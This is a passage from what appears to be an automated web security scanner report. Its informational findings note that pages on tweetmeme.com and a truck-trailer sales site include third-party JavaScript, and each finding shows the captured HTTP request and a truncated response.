P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 089e4fa19af2efc7c60bdb03ea3a2cbe=27129c0bc3f4bbc294183027f453203c; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="mk-mk" lang="mk-mk"
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/locale/mk.js" charset="utf-8"></script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script><script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

21.345. http://trailer.commercialtrucktrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trailer.commercialtrucktrader.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: trailer.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:05:40 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 97842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Truck Trailers For Sale | CommercialTruckTrader.com</title>
<meta name="description" c
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.346. http://tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

Response

21.347. http://tweetmeme.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.1.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; __csref=; __cst=c361a3372a99df5c; __csv=286f8b371579253c; __csnv=2d2e35941c7237e0; __ctl=286f8b371579253c1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:21:10 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0001378059387207
X-Served-In: 0.0068099498748779
X-Served-By: h00
Content-Length: 24610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Abo
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.348. http://tweetmeme.com/about/advertising previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/advertising

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/advertising HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:34 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00011515617370605
X-Served-In: 0.0066850185394287
X-Served-By: ded2059
Content-Length: 22733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Adv
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.349. http://tweetmeme.com/about/advertising/display previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/advertising/display

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/advertising/display HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:47:13 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010180473327637
X-Served-In: 0.0058400630950928
X-Served-By: h01
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Dis
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.350. http://tweetmeme.com/about/advertising/featured_tweets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/advertising/featured_tweets

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/advertising/featured_tweets HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:59 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00012493133544922
X-Served-In: 0.0067188739776611
X-Served-By: h00
Content-Length: 23493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Fea
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.351. http://tweetmeme.com/about/advertising/retweet_ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/advertising/retweet_ads

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/advertising/retweet_ads HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:47:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010299682617188
X-Served-In: 0.0059108734130859
X-Served-By: h03
Content-Length: 23166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ret
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.352. http://tweetmeme.com/about/bookmarklet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/bookmarklet

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/bookmarklet HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0021569728851318
X-Served-In: 0.023491859436035
X-Served-By: ded2060
Content-Length: 24909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.353. http://tweetmeme.com/about/channels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/channels

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/channels HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:56 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 9.9897384643555E-5
X-Served-In: 0.0062339305877686
X-Served-By: ded2059
Content-Length: 22892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Cha
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.354. http://tweetmeme.com/about/follow_button previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/follow_button

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/follow_button HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:50:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0001060962677002
X-Served-In: 0.0063591003417969
X-Served-By: h04
Content-Length: 24677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twi
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.355. http://tweetmeme.com/about/plugins previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/plugins

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/plugins HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 9.4175338745117E-5
X-Served-In: 0.0085899829864502
X-Served-By: ded2060
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ret
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.356. http://tweetmeme.com/about/plugins/chrome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/plugins/chrome

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/plugins/chrome HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:50:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010299682617188
X-Served-In: 0.0056250095367432
X-Served-By: h02
Content-Length: 23612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.357. http://tweetmeme.com/about/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/privacy

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/privacy HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:45 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00013995170593262
X-Served-In: 0.0065500736236572
X-Served-By: h02
Content-Length: 23922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Pri
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.358. http://tweetmeme.com/about/pro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/pro

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/pro HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:48:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.7962875366211E-5
X-Served-In: 0.0068199634552002
X-Served-By: h01
Content-Length: 24111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.359. http://tweetmeme.com/about/pro/signup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/pro/signup

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/pro/signup HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:50:35 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.0095062255859E-5
X-Served-In: 0.0051848888397217
X-Served-By: h01
Content-Length: 23032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.360. http://tweetmeme.com/about/retweet_button previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/retweet_button

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/retweet_button HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:48:49 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 8.8214874267578E-5
X-Served-In: 0.0063040256500244
X-Served-By: ded2059
Content-Length: 26519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twi
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.361. http://tweetmeme.com/about/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/about/terms

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /about/terms HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:44 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.2002410888672E-5
X-Served-In: 0.0048558712005615
X-Served-By: h03
Content-Length: 26891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ter
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.362. http://tweetmeme.com/category/comedy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/comedy

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/comedy HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:24 GMT
Content-Type: text/html
Connection: close
